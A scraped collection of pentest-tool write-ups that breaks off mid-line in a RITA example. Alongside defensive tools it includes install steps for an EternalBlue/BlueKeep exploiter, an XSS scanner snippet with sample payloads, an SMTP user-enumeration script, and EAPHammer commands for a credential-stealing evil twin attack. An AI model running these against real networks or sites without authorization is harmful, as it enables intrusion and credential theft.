Channel: KitPloit - PenTest Tools!

Maryam - Open-source intelligence (OSINT) Framework

Maryam is a full-featured open-source intelligence (OSINT) framework written in Python. Complete with independent modules, built-in functions, interactive help, and command completion, it provides a command-line environment for forensic and open-source intelligence (OSINT) work.
Maryam is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Each module is a subclass of the "module" class. The "module" class is a customized "cmd" interpreter equipped with built-in functionality that provides simple interfaces to common tasks such as standardizing output and making web requests. Therefore, all the hard work has been done. Building modules is simple and takes little more than a few minutes. See the Development Guide for more information.
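To show the pattern in spirit, here is a minimal, hypothetical sketch of a module built on Python's standard cmd class; the class and method names below are illustrative only and are not Maryam's actual API:

# Schematic illustration of the pattern described above (hypothetical names,
# not Maryam's real API): a base class wrapping cmd.Cmd with shared helpers,
# and a concrete module that only implements its own logic.
import cmd
import urllib.request

class BaseModule(cmd.Cmd):
    """Shared plumbing: standardized output and simple web requests."""
    def output(self, msg):
        print("[*] %s" % msg)

    def request(self, url):
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.read().decode(errors="replace")

class DnsSearch(BaseModule):
    """A hypothetical module: everything except its own logic is inherited."""
    prompt = "dns_search> "

    def do_run(self, domain):
        # The URL below is a placeholder search endpoint, not a real source.
        self.output("querying example source for %s" % domain)
        body = self.request("https://example.com/search?q=%s" % domain)
        self.output("received %d bytes" % len(body))

if __name__ == "__main__":
    DnsSearch().cmdloop()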

What can be done
Can extract
  • Comments, links, CDNs, CSS and JS files
  • Documents (pdf, doc, ...)
  • Keywords, errors, usernames, ...
  • DNS records and TLDs, including brute-forcing
  • Sitemap
Can identify
  • Interesting and important files
  • Emails from search engines
  • Onion related links
  • Subdomains from different sources
  • WebApps, WAF,..
  • Social networks
  • ..

Links

OWASP

Wiki

Modules Guide



Zeek - A Powerful Network Analysis Framework That Is Much Different From The Typical IDS You May Know

A powerful framework for network traffic analysis and security monitoring.
Follow us on Twitter at @zeekurity.

Key Features
  • In-depth Analysis Zeek ships with analyzers for many protocols, enabling high-level semantic analysis at the application layer.
  • Adaptable and Flexible Zeek's domain-specific scripting language enables site-specific monitoring policies and means that it is not restricted to any particular detection approach.
  • Efficient Zeek targets high-performance networks and is used operationally at a variety of large sites.
  • Highly Stateful Zeek keeps extensive application-layer state about the network it monitors and provides a high-level archive of a network's activity.

Getting Started
The best place to find information about getting started with Zeek is our web site www.zeek.org, specifically the documentation section there. On the web site you can also find downloads for stable releases, tutorials on getting Zeek set up, and many other useful resources.
You can find release notes in NEWS, and a complete record of all changes in CHANGES.
To work with the most recent code from the development branch of Zeek, clone the master git repository:
git clone --recursive https://github.com/zeek/zeek
With all dependencies in place, build and install:
./configure && make && sudo make install
Write your first Zeek script:
# File "hello.zeek"

event zeek_init()
{
print "Hello World!";
}
And run it:
zeek hello.zeek
To learn more about the Zeek scripting language, try.zeek.org is a great resource.

Development
Zeek is developed on GitHub by its community. We welcome contributions. Working on an open source project like Zeek can be an incredibly rewarding experience and, packet by packet, makes the Internet a little safer. Today, as a result of countless contributions, Zeek is used operationally around the world by major companies and educational and scientific institutions alike for securing their cyber infrastructure.
If you're interested in getting involved, we collect feature requests and issues on GitHub here and you might find these to be a good place to get started. More information on Zeek's development can be found here, and information about its community and mailing lists (which are fairly active) can be found here.


Ispy - Eternalblue (MS17-010) / Bluekeep (CVE-2019-0708) Scanner And Exploit

ispy: EternalBlue (MS17-010) / BlueKeep (CVE-2019-0708) scanner and exploiter (Metasploit automation)

How to install :
git clone https://github.com/Cyb0r9/ispy.git
cd ispy
chmod +x setup.sh
./setup.sh

Screenshots :






Tested On :
  • Parrot OS
  • Kali linux

Tutorial ( How to use ispy )



Disclaimer :

Usage of ispy for attacking targets without prior mutual consent is illegal.
ispy is for security testing purposes only.


MalConfScan - Volatility Plugin For Extracts Configuration Data Of Known Malware


MalConfScan is a Volatility plugin that extracts configuration data of known malware. Volatility is an open-source memory forensics framework for incident response and malware analysis. This tool searches for malware in memory images and dumps configuration data. In addition, this tool has a function to list strings to which malicious code refers.

Supported Malware Families
MalConfScan can dump the following malware configuration data, decoded strings or DGA domains:
  • Ursnif
  • Emotet
  • Smoke Loader
  • PoisonIvy
  • CobaltStrike
  • NetWire
  • PlugX
  • RedLeaves / Himawari / Lavender / Armadill / zark20rk
  • TSCookie
  • TSC_Loader
  • xxmm
  • Datper
  • Ramnit
  • HawkEye
  • Lokibot
  • Bebloh (Shiotob/URLZone)
  • AZORult
  • NanoCore RAT
  • AgentTesla
  • FormBook
  • NodeRAT (https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html)
  • njRAT
  • TrickBot
  • Remcos
  • QuasarRAT
  • Pony

Additional Analysis
MalConfScan has a function to list the strings referenced by malicious code. Configuration data is usually stored encoded by the malware, but because the malware writes the decoded configuration data to memory at runtime, it may still be resident there. This feature can list that decoded configuration data.

How to Install
If you want to know more details, please check the MalConfScan wiki.

How to Use
MalConfScan has two functions: malconfscan and malstrscan.

Export known malware configuration
$ python vol.py malconfscan -f images.mem --profile=Win7SP1x64

List the referenced strings
$ python vol.py malstrscan -f images.mem --profile=Win7SP1x64
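Because both commands are plain Volatility invocations, they are easy to script. A minimal sketch that sweeps a directory of memory images (the image directory, interpreter name and profile are assumptions for illustration):

# Run MalConfScan's malconfscan plugin over every *.mem image in a directory.
# The "images/" path, the "python" interpreter (Volatility 2 may need python2)
# and the Win7SP1x64 profile are assumptions for this sketch.
import glob
import subprocess

PROFILE = "Win7SP1x64"

for image in glob.glob("images/*.mem"):
    result = subprocess.run(
        ["python", "vol.py", "malconfscan", "-f", image, "--profile=" + PROFILE],
        capture_output=True, text=True)
    with open(image + ".malconfscan.txt", "w") as fh:
        fh.write(result.stdout)
    print("scanned", image)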

MalConfScan with Cuckoo
Malware configuration data can be dumped automatically by adding MalConfScan to Cuckoo Sandbox. If you need more details on Cuckoo and MalConfScan integration, please check MalConfScan with Cuckoo.


Mosca - Manual Search Tool To Find Bugs Like A Grep Unix Command


Mosca

Manual analysis tool to find bugs, like a grep-style Unix command. Version 0.05.
Mosca is not dynamic: it searches static code, so don't confuse it with academic approaches; there is no graph or CFG here, it is a simple "grep".
  • "Egg" modules are configuration files describing the vulnerabilities to search for
  • Can be used on C, PHP, JavaScript, Ruby, etc.
  • Saves results to an XML file
  • Create your own modules, etc.
  • Why static?
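To make the "simple grep" idea concrete, here is a rough Python sketch of the approach. It is an illustration only, not Mosca's code, and the patterns stand in for what an egg module would define:

# Toy illustration of the "static grep" approach: sweep source files for
# patterns that usually deserve a manual look. Not Mosca's actual code.
import os
import re

PATTERNS = {
    "php_exec": re.compile(r"\b(system|exec|passthru)\s*\("),
    "c_strcpy": re.compile(r"\bstrcpy\s*\("),
}

def scan(root):
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith((".c", ".php", ".js", ".rb")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    for label, rx in PATTERNS.items():
                        if rx.search(line):
                            print("%s:%d [%s] %s" % (path, lineno, label, line.strip()))

if __name__ == "__main__":
    scan(".")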


DECAF - Short for Dynamic Executable Code Analysis Framework

DECAF++, the new version of DECAF, makes taint analysis around 2X faster, making it, to the best of our knowledge, the fastest whole-system dynamic taint analysis framework. This results in much better usability, imposing only a 4% overhead (SPEC CPU2006) when no suspicious (tainted) input exists. Even under heavy taint analysis workloads, DECAF++ performs much better, around 25% faster on nbench, because of its elasticity. This elasticity makes DECAF++ very suitable for security analysis tasks that selectively analyze their input, e.g. Intrusion Detection Systems (IDS) that can filter out benign traffic. For further technical details, see our RAID 2019 paper.



PUBLICATIONS
  1. Ali Davanian, Zhenxiao Qi, Yu Qu, and Heng Yin, DECAF++: Elastic Whole-System Dynamic Taint Analysis, In the 22nd International Symposium on Research in Attacks, Intrusions and Defenses (RAID), September 2019. (If you wish to cite the new optimized version of DECAF, please cite this paper)
  2. "Make it work, make it right, make it fast: building a platform-neutral whole-system dynamic binary analysis platform", Andrew Henderson, Aravind Prakash, Lok Kwong Yan, Xunchao Hu, Xujiewen Wang, Rundong Zhou, and Heng Yin, to appear in the International Symposium on Software Testing and Analysis (ISSTA'14), San Jose, CA, July 2014.(If you wish to cite DECAF, please cite this paper)
  3. Lok Kwong Yan, Andrew Henderson, Xunchao Hu, Heng Yin, and Stephen McCamant. On soundness and precision of dynamic taint analysis. Technical Report SYR-EECS-2014-04, Syracuse University, January 2014.
  4. "DroidScope: Seamlessly Reconstructing OS and Dalvik Semantic Views for Dynamic Android Malware Analysis", Lok-Kwong Yan and Heng Yin, in the 21st USENIX Security Symposium, Bellevue, WA, August 8-10, 2012.

Introduction
DECAF (Dynamic Executable Code Analysis Framework) is the successor to the binary analysis techniques developed for TEMU (the dynamic analysis component of BitBlaze) as part of Heng Yin's work on the BitBlaze project headed up by Dawn Song. DECAF builds upon TEMU. We appreciate all who worked with us on that project.


Fig 1: The overall architecture of DECAF
Fig 1 illustrates the overall architecture of DECAF. DECAF is a platform-agnostic whole-system dynamic binary analysis framework. It provides the following key features.

Right-on-Time Virtual Machine Introspection
Unlike TEMU, DECAF doesn't use a guest driver to retrieve OS-level semantics. The VMI component of DECAF is able to reconstruct a fresh OS-level view of the virtual machine, including processes, threads, code modules, and symbols, to support binary analysis. Further, in order to support multiple architectures and operating systems, it follows a platform-agnostic design. The workflow for extracting OS-level semantic information is common across multiple architectures and operating systems; the only platform-specific handling lies in which kernel data structures and which fields to extract information from.

Support for Multiple Platforms
Ideally, we would like to have the same analysis code (with minimal platform-specific code) work for different CPU architectures (e.g., x86 and ARM) and different operating systems (e.g., Windows and Linux). This requires that the analysis framework hide the architecture and operating system specific details from the analysis plugins. Further, to make the analysis framework itself maintainable and extensible to new architectures and operating systems, the platform-specific code within the framework should also be minimized. DECAF provides support for both multiple architectures and multiple operating systems. Currently, DECAF supports 32-bit Windows XP, Windows 7, and Linux on x86 and ARM.

Precise and Lossless Tainting
DECAF ensures precise tainting by maintaining bit-level precision for CPU registers and memory, and by inlining precise tainting rules in the translated code blocks. Thus, the taint status for each CPU register and memory location is processed and updated synchronously during the code execution of the virtual machine, while the propagation of taint labels is done in an asynchronous manner. By implementing such tainting logic mainly at the intermediate representation level (more concretely, the TCG IR level), it becomes easy to extend tainting support to a new CPU architecture.

Event-driven programming interfaces
DECAF provides an event-driven programming interface. The paradigm of "instrument in the translation phase, then analyze in the execution phase" is invisible to the analysis plugins: a plugin only needs to register for the events it is interested in and implement the corresponding event handling functions. The details of code instrumentation are taken care of by the framework.
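The registration pattern can be illustrated with a short Python sketch. DECAF's real interface is a C API, so the names below are purely illustrative:

# Minimal event-registration sketch to illustrate the paradigm described
# above; DECAF's real interface is a C API, and these names are hypothetical.
callbacks = {}

def register(event, handler):
    callbacks.setdefault(event, []).append(handler)

def dispatch(event, **info):
    for handler in callbacks.get(event, []):
        handler(**info)

# A "plugin" only registers for the events it cares about.
def on_block_begin(pc, **_):
    print("block @ 0x%x" % pc)

register("block_begin", on_block_begin)

# The framework dispatches events as the guest executes.
dispatch("block_begin", pc=0x401000)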

Dynamic instrumentation management
To reduce runtime overhead, the instrumentation code is inserted into the translated code only when necessary. For example, when a plugin registers a function hook at a function’s entry point, the instrumentation code for this hook is only placed at the function entry point. When the plugin unregisters this function hook, the instrumentation code will also be removed from the translated code accordingly. To ease the development of plugins, the management of dynamic code instrumentation is completely taken care of in the framework, and thus invisible to the plugins.

Help Documents
Please refer to our wiki page for help documents.


Traxss - Automated XSS Vulnerability Scanner

Automated Vulnerability Scanner for XSS | Written in Python3 | Utilizes Selenium Headless

Traxss is an automated framework to scan URLs and webpages for XSS Vulnerabilities. It includes over 575 Payloads to test with and multiple options for robustness of tests. View the gif above to see a preview of the fastest type of scan.

Getting Started

Prerequisites
Traxss depends on Chromedriver. On MacOS this can be installed with the homebrew command:
brew cask install chromedriver
Alternatively, find a version for other operating systems here: https://sites.google.com/a/chromium.org/chromedriver/downloads

Installation
Run the command:
pip3 install -r requirements.txt

Running Traxss
Traxss can be started with the command:
python3 traxss.py
This will launch an interactive CLI to guide you through the process.

Types of Scans

Full Scan w/ HTML
Uses a query scan with 575+ payloads and attempts to find XSS vulnerabilities by passing parameters through the URL. It will also render the HTML and attempt to find manual XSS vulnerabilities (this feature is still in beta).
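The underlying reflected-payload check can be sketched in a few lines of Python using the requests package. This is an illustration of the general technique, not Traxss's implementation; the URL and parameter name are placeholders:

# Rough illustration of a URL-parameter XSS check: inject a marker payload
# and see whether it is reflected unencoded. Not Traxss's implementation.
import requests

PAYLOADS = ['<script>alert(1)</script>', '"><svg onload=alert(1)>']

def check(url, param):
    for payload in PAYLOADS:
        resp = requests.get(url, params={param: payload}, timeout=10)
        if payload in resp.text:
            print("possible reflected XSS: %s (param %s)" % (resp.url, param))

if __name__ == "__main__":
    # Placeholder target and parameter; point this at something you own.
    check("http://example.com/search", "q")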

Full Scan w/o HTML
This scan will run the query scan only.

Fast Scan w/ HTML
This scan is the same as the full w/ HTML but it will only use 7 attack vectors rather than the 575+ vectors.

Fast Scan w/o HTML
This scan is the same as the full scan w/o HTML, but it will only use 7 attack vectors rather than the 575+ vectors.


Fsmon - Monitor Filesystem On iOS / OS X / Android / FirefoxOS / Linux

FileSystem Monitor utility that runs on Linux, Android, iOS and OSX.
Brought to you by Sergi Àlvarez at Nowsecure and distributed under the MIT license.
Contact: pancake@nowsecure.com

Usage
The tool retrieves file system events from a specific directory and shows them in colorful format or in JSON.
It is possible to filter the events happening from a specific program name or process id (PID).
Usage: ./fsmon [-jc] [-a sec] [-b dir] [-B name] [-p pid] [-P proc] [path]
-a [sec] stop monitoring after N seconds (alarm)
-b [dir] backup files to DIR folder (EXPERIMENTAL)
-B [name] specify an alternative backend
-c follow children of -p PID
-f show only filename (no path)
-h show this help
-j output in JSON format
-L list all filemonitor backends
-p [pid] only show events from this pid
-P [proc] events only from process name
-v show version
[path] only get events from this path
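The JSON output (-j) makes it easy to consume events from another process. A minimal sketch, assuming one JSON object per line and the field names shown in the comments (verify both against your fsmon build):

# Consume fsmon's JSON output (-j) from Python and print file events.
# Assumes one JSON object per line; the "type" and "filename" field names
# are assumptions, so check your build's actual output format.
import json
import subprocess

proc = subprocess.Popen(["./fsmon", "-j", "/tmp"],
                        stdout=subprocess.PIPE, text=True)
for line in proc.stdout:
    line = line.strip().rstrip(",")
    if not line or line in "[]":
        continue
    try:
        event = json.loads(line)
    except ValueError:
        continue
    print(event.get("type"), event.get("filename"))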

Backends
fsmon filesystem information is taken from different backends depending on the operating system and the APIs available.
This is the list of backends that can be listed with fsmon -L:
  • inotify (linux / android)
  • fanotify (linux > 2.6.36 / android 5)
  • devfsev (osx /dev/fsevents - requires root)
  • kqueue (xnu - requires root)
  • kdebug (bsd?, xnu - requires root)
  • fsevapi (osx filesystem monitor api)

Compilation
fsmon is a portable tool. It works on iOS, OSX, Linux and Android (x86, arm, arm64, mips)
Linux
$ make
OSX + iOS fatbin
$ make
iOS
$ make ios
Android
$ make android NDK_ARCH=<ARCH> ANDROID_API=<API>
To get fsmon installed system wide just type:
$ make install
Changing installation path...
$ make install PREFIX=/usr DESTDIR=/



Tylium - Primary Data Pipelines For Intrusion Detection, Security Analytics And Threat Hunting

These files contain configuration for producing EDR (endpoint detection and response) data in addition to standard system logs. These configurations enable the production of these data streams using F/OSS (free and/or open source) tooling. The F/OSS tools consist of auditd for Linux, Sysmon for Windows, and xnumon for the Mac. Also included is a set of notes for configuring Suricata events and rules.
These data sets enumerate and/or generate the kinds of security-relevant events that are required by threat hunting techniques and a wide variety of security analytics.
Tylium is part of the SpaceCake project for doing multi-platform intrusion detection, security analytics and threat hunting using open source tools for Linux and Windows in both cloud and conventional environments.

Contents:

Linux
auditd.yaml - a set of auditd rules for generating file, network and process events via the auditd subsystem for Linux
SystemLogs.md - a matrix of Linux native operating system and web server logs

MacOS
configuration.plist - a configuration for generating Sysmon-like events using the xnumon project on macOS

Suricata
Notes on event and rule setup for Suricata in cloud vs. terrestrial environments

Windows
EventLogs.md - a matrix of select Windows event log messages and their locations
sysmon-config-base.xml - a Sysmon configuration file for generating file, network, registry, process and WMI events using Sysmon for Windows


SMTPTester - Tool To Check Common Vulnerabilities In SMTP Servers


SMTPTester is a python3 tool to test SMTP servers for 3 common vulnerabilities:
  • Spoofing - the ability to send a mail on behalf of an internal user
  • Relay - using the SMTP server to send email to an address outside of the organization
  • User enumeration - using the SMTP VRFY command to check if a specific username and/or email address exists within the organization
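As an example of what the VRFY check boils down to, here is a minimal sketch using Python's standard smtplib, independent of SMTPTester itself; the host and usernames are placeholders, and many servers disable VRFY:

# Minimal VRFY-based user enumeration sketch with the standard library;
# host and usernames are placeholders. Codes 250/251 usually indicate the
# user exists; 252 means the server will not confirm either way.
import smtplib

def vrfy(host, users):
    smtp = smtplib.SMTP(host, 25, timeout=10)
    try:
        for user in users:
            code, msg = smtp.verify(user)
            print("%s: %d %s" % (user, code, msg.decode(errors="replace")))
    finally:
        smtp.quit()

if __name__ == "__main__":
    vrfy("mail.example.com", ["root", "admin", "jdoe"])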

How to use it
First, install the needed dependencies:
pip install -r requirments.txt
Second, run the tool with the needed flags:
python SMTPTester.py --tester [tester email] --targets [SMTP IP or file containing multiple IPs]

Options to consider
  • -i\--internal
    • test only for mail spoofing
  • -e\--external
    • test only for mail relay
  • -v\--vrfy
    • only perform user enumeration
The tool will perform both internal and external tests when no specific test type is specified, and will append the output to a log file in the same folder as the SMTPTester.py file.

Issues, bugs and other code-issues
Yeah, I know, this code isn't the best. I'm fine with it as I'm not a developer and this is part of my learning process. If there is an option to do some of it better, please, let me know.
Not how many, but where.
v0.1


uniFuzzer - A Fuzzing Tool For Closed-Source Binaries Based On Unicorn And LibFuzzer

uniFuzzer is a fuzzing tool for closed-source binaries based on Unicorn and LibFuzzer. Currently it supports fuzzing 32-bit LSB ELF files on ARM/MIPS, which are usually seen in IoT devices.
中文介绍

Features
  • very little hacking required and easy to build
  • can target any specified function or code snippet
  • coverage-guided fuzzing with considerable speed
  • dependencies resolved and loaded automatically
  • library function override via PRELOAD

Build
  1. Reverse the target binary and find interesting functions for fuzzing.
  2. Create a .c file in the directory callback, which should contain the following callbacks:
  • void onLibLoad(const char *libName, void *baseAddr, void *ucBaseAddr): invoked each time a dependent library is loaded in Unicorn.
  • int uniFuzzerInit(uc_engine *uc): invoked just after all the binaries have been loaded in Unicorn. Stack, heap, and registers can be set up here.
  • int uniFuzzerBeforeExec(uc_engine *uc, const uint8_t *data, size_t len): invoked before each round of fuzzing execution.
  • int uniFuzzerAfterExec(uc_engine *uc): invoked after each round of fuzzing execution.
  3. Run make and get the fuzzing tool named uf.

Run
uniFuzzer uses the following environment variables as parameters:
  • UF_TARGET: Path of the target ELF file
  • UF_PRELOAD: Path of the preload library. Please make sure that the library has the same architecture as the target.
  • UF_LIBPATH: Paths in which the dependent libraries reside. Use : to separate multiple paths.
And the fuzzing can be started using the following command:
UF_TARGET=<target> [UF_PRELOAD=<preload>] UF_LIBPATH=<libPath> ./uf
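Since all parameters are passed through the environment, a run can be scripted easily. A small Python launcher sketch (the paths are placeholders; only the three documented variables are used):

# Launch uniFuzzer with its documented environment variables set;
# all paths below are placeholders for your own target and libraries.
import os
import subprocess

env = dict(os.environ,
           UF_TARGET="./demo-vuln",
           UF_PRELOAD="./demo-libcpreload.so",
           UF_LIBPATH="/usr/mipsel-linux-gnu/lib")

subprocess.run(["./uf"], env=env, check=False)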

Demo
A demo of basic usage is included. The demo contains the following files:
  • demo-vuln.c: This is the target for fuzzing. It contains a simple function named vuln() which is vulnerable to stack/heap overflow.
  • demo-libcpreload.c: This is for PRELOAD hooking. It defines an empty printf() and simplified malloc()/free().
  • callback/demo-callback.c: This defines the necessary callbacks for fuzzing the demo vuln() function.
First, please install gcc for mipsel (package gcc-mipsel-linux-gnu on Debian) to build the demo:
# the target binary
# '-Xlinker --hash-style=sysv' tells gcc to use 'DT_HASH' instead of 'DT_GNU_HASH' for symbol lookup
# since currently uniFuzzer does not support 'DT_GNU_HASH'
mipsel-linux-gnu-gcc demo-vuln.c -Xlinker --hash-style=sysv -no-pie -o demo-vuln

# the preload library
mipsel-linux-gnu-gcc -shared -fPIC -nostdlib -Xlinker --hash-style=sysv demo-libcpreload.c -o demo-libcpreload.so
Or you can just use the files demo-vuln and demo-libcpreload.so, which are compiled using the commands above.
Next, run make to build uniFuzzer. Please note that if you compiled the MIPS demo by yourself, then some addresses might be different from the prebuilt one and demo-callback.c should be updated accordingly.
Finally, make sure that the libc library of MIPS is ready. On Debian it's in /usr/mipsel-linux-gnu/lib/ after installing the package libc6-mipsel-cross, and that's what UF_LIBPATH should be:
UF_TARGET=<path to demo-vuln> UF_PRELOAD=<path to demo-libcpreload.so> UF_LIBPATH=<lib path for MIPS> ./uf

Hack on Unicorn
Unicorn clears the JIT cache of QEMU due to this issue, which slows down the speed of fuzzing since the target binary would have to be JIT re-compiled during each round of execution.
We can comment out tb_flush(env); as stated in that issue for performance.


Unicorn-Bios - Basic BIOS Emulator For Unicorn Engine

Basic BIOS emulator/debugger for Unicorn Engine.
Written to debug the XEOS Operating System boot sequence.

Usage:
Usage: unicorn-bios [OPTIONS] BOOT_IMG

Options:

--help / -h: Displays help.
--memory / -m: The amount of memory to allocate for the virtual machine
(in megabytes). Defaults to 64MB, minimum 2MB.
--break / -b: Breaks on a specific address.
--break-int: Breaks on interrupt calls.
--break-iret: Breaks on interrupt returns.
--trap: Raises a trap when breaking.
--debug-video: Turns on debug output for video services.
--single-step: Breaks on every instruction.
--no-ui: Don't start the user interface (output will be displayed to stdout, debug info to stderr).
--no-colors: Don't use colors.

Installation:
brew install --HEAD macmade/tap/unicorn-bios

Repository Infos
Owner:          Jean-David Gadina - XS-Labs
Web: www.xs-labs.com
Blog: www.noxeos.com
Twitter: @macmade
GitHub: github.com/macmade
LinkedIn: ch.linkedin.com/in/macmade/
StackOverflow: stackoverflow.com/users/182676/macmade


Postenum - A Clean, Nice And Easy Tool For Basic/Advanced Privilege Escalation Techniques

Postenum is a clean, nice and easy tool for basic/advanced privilege escalation vectors/techniques. The Postenum tool is intended to be executed locally on a Linux box.
Be more than a normal user. Be the ROOT.

USE
./postenum.sh [option]
./postenum.sh -s
./postenum.sh -c

Options :
-a : All
-s : Filesystem [SUID, SGID, Config/DB files, etc.]
-l : Shell escape and development tools
-c : The most interesting files
-n : Network settings
-p : Services and cron jobs
-o : OS information and kernel exploits
-v : Software versions
-t : Fstab credentials and databases checker

Install.sh
You can use the install.sh script to install Postenum (only for system/network admins). To run it:
./install.sh

Version 0.8


Eaphammer v1.9.0 - Targeted Evil Twin Attacks Against WPA2-Enterprise Networks

by Gabriel Ryan (s0lst1c3)(gryan[at]specterops.io)

EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such, focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate just how fast this tool is, our Quick Start section provides an example of how to execute a credential stealing evil twin attack against a WPA/2-EAP network in just a few commands.

Quick Start Guide (Kali)
Begin by cloning the eaphammer repo using the following command:
git clone https://github.com/s0lst1c3/eaphammer.git
Next run the kali-setup file as shown below to complete the eaphammer setup process. This will install dependencies and compile the project:
./kali-setup
To setup and execute a credential stealing evil twin attack against a WPA/2-EAP network:
# generate certificates
./eaphammer --cert-wizard

# launch attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

Usage and Setup Instructions
For complete usage and setup instructions, please refer to the project's wiki page:

Features
  • Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks.
  • Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots
  • Perform captive portal attacks
  • Built-in Responder integration
  • Support for Open networks and WPA-EAP/WPA2-EAP
  • No manual configuration necessary for most attacks.
  • No manual configuration necessary for installation and setup process
  • Leverages latest version of hostapd (2.8)
  • Support for evil twin and karma attacks
  • Generate timed Powershell payloads for indirect wireless pivots
  • Integrated HTTP server for Hostile Portal attacks
  • Support for SSID cloaking
  • Fast and automated PMKID attacks against PSK networks using hcxtools
  • Password spraying across multiple usernames against a single ESSID

New (as of Version 1.7.0)(latest):
EAPHammer now supports WPA/2-PSK along with WPA handshake captures.

OWE (added as of Version 1.5.0):
EAPHammer now supports rogue AP attacks against OWE and OWE-Transition mode networks.

PMF (added as of Version 1.4.0)
EAPHammer now supports 802.11w (Protected Management Frames), Loud Karma attacks, and Known Beacon attacks (documentation coming soon).

GTC Downgrade Attacks
EAPHammer will now automatically attempt a GTC Downgrade attack against connected clients in an attempt to capture plaintext credentials (see: https://www.youtube.com/watch?v=-uqTqJwTFyU&feature=youtu.be&t=22m34s).

Improved Certificate Handling
EAPHammer's Cert Wizard has been expanded to provide users with the ability to create, import, and manage SSL certificates in a highly flexible manner. Cert Wizard's previous functionality has been preserved as Cert Wizard's Interactive Mode, which uses the same syntax as previous versions. See XIII - Cert Wizard for additional details.

TLS / SSL Backwards Compatibility
EAPHammer now uses a local build of libssl that exists independently of the systemwide install. This local version is compiled with support for SSLv3, allowing EAPHammer to be used against legacy clients without compromising the integrity of the attacker's operating system.

Supported EAP Methods
EAPHammer supports the following EAP methods:
  • EAP-PEAP/MSCHAPv2
  • EAP-PEAP/GTC
  • EAP-PEAP/MD5
  • EAP-TTLS/PAP
  • EAP-TTLS/MSCHAP
  • EAP-TTLS/MSCHAPv2
  • EAP-TTLS/MSCHAPv2 (no EAP)
  • EAP-TTLS/CHAP
  • EAP-TTLS/MD5
  • EAP-TTLS/GTC
  • EAP-MD5

802.11a and 802.11n Support
EAPHammer now supports attacks against 802.11a and 802.11n networks. This includes the ability to create access points that support the following features:
  • Both 2.4 GHz and 5 GHz channel support
  • Full MIMO support (multiple input, multiple output)
  • Frame aggregation
  • Support for 40 MHz channel widths using channel bonding
  • High Throughput Mode
  • Short Guard Interval (Short GI)
  • Modulation & coding scheme (MCS)
  • RIFS
  • HT power management

Upcoming Features
  • Perform seamless MITM attacks with partial HSTS bypasses
  • directed rogue AP attacks (deauth then evil twin from PNL, deauth then karma + ACL)
  • Integrated website cloner for cloning captive portal login pages
  • Integrated HTTP server for captive portals

Contributing
Contributions are encouraged and more than welcome. Please attempt to adhere to the provided issue and feature request templates.

Versioning
We use SemVer for versioning (or at least make an effort to). For the versions available, see https://github.com/s0lst1c3/eaphammer/releases.

License
This project is licensed under the GNU Public License 3.0 - see the LICENSE.md file for details.

Acknowledgments
This tool either builds upon, is inspired by, or directly incorporates nearly fifteen years of prior research and development from the following awesome people:
  • Brad Antoniewicz
  • Joshua Wright
  • Robin Wood
  • Dino Dai Zovi
  • Shane Macauly
  • Domanic White
  • Ian de Villiers
  • Michael Kruger
  • Moxie Marlinspike
  • David Hulton
  • Josh Hoover
  • James Snodgrass
  • Adam Toscher
  • George Chatzisofroniou
  • Mathy Vanhoef
For a complete description of what each of these people has contributed to the current wireless security landscape and this tool, please see:
EAPHammer leverages a modified version of hostapd-wpe (shoutout to Brad Anton for creating the original), dnsmasq, asleap, hcxpcaptool and hcxdumptool for PMKID attacks, Responder, and Python 3.5+.
Finally, huge shoutout to the SpecterOps crew for supporting this project and being a constant source of inspiration.


RITA - Real Intelligence Threat Analytics

RITA is an open source framework for network traffic analysis.
The framework ingests Bro/Zeek Logs in TSV format, and currently supports the following major features:
  • Beaconing Detection: Search for signs of beaconing behavior in and out of your network
  • DNS Tunneling Detection: Search for signs of DNS-based covert channels
  • Blacklist Checking: Query blacklists to search for suspicious domains and hosts

Automatic Installation
The automatic installer is officially supported on Ubuntu 16.04 LTS, Security Onion*, and CentOS 7
  • Download the latest install.sh file from the release page
  • Make the installer executable: chmod +x ./install.sh
  • Run the installer: sudo ./install.sh
* Please see the Security Onion RITA wiki page for further information pertaining to using RITA on Security Onion.

Manual Installation
To install each component of RITA by hand, check out the instructions in the docs.

Upgrading RITA
See this guide for upgrade instructions.

Getting Started

System Requirements
  • Operating System - The preferred platform is 64-bit Ubuntu 16.04 LTS. The system should be patched and up to date using apt-get.
  • Processor (when installed alongside Bro/Zeek) - Two cores plus an additional core for every 100 Mb of traffic being captured. (three cores minimum). This should be dedicated hardware, as resource congestion with other VMs can cause packets to be dropped or missed.
  • Memory - 16GB minimum. 64GB if monitoring 100Mb or more of network traffic. 128GB if monitoring 1Gb or more of network traffic.
  • Storage - 300GB minimum. 1TB or more is recommended to reduce log maintenance.
  • Network - In order to capture traffic with Bro/Zeek, you will need at least 2 network interface cards (NICs). One will be for management of the system and the other will be the dedicated capture port. Intel NICs perform well and are recommended.

Configuration File
RITA's config file is located at /etc/rita/config.yaml though you can specify a custom path on individual commands with the -c command line flag.
❗️IMPORTANT❗️
  • The Filtering: InternalSubnets section must be configured or you will not see any results in certain modules (e.g. beacons, long connections). If your network uses the standard RFC1918 internal IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) you just need to uncomment the default InternalSubnets section already in the config file. Otherwise, adjust this section to match your environment. RITA's main purpose is to find signs of a compromised internal system talking to an external system, and it will automatically exclude internal-to-internal and external-to-external connections from parts of the analysis.
You may also wish to change the defaults for the following option:
  • Filtering: AlwaysInclude - Ranges listed here are exempt from the filtering applied by the InternalSubnets setting. The main use for this is to include internal DNS servers so that you can see the source of any DNS queries made.
Note that any value listed in the Filtering section should be in CIDR format. So a single IP of 192.168.1.1 would be written as 192.168.1.1/32.
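Python's standard ipaddress module is a quick way to double-check the CIDR values you put in the Filtering section; a small sketch:

# Quick sanity checks for the CIDR values used in RITA's Filtering section.
import ipaddress

# A single host is written with a /32 mask.
print(ipaddress.ip_network("192.168.1.1/32"))

# Verify that an address falls inside one of the RFC1918 InternalSubnets.
internal = [ipaddress.ip_network(n)
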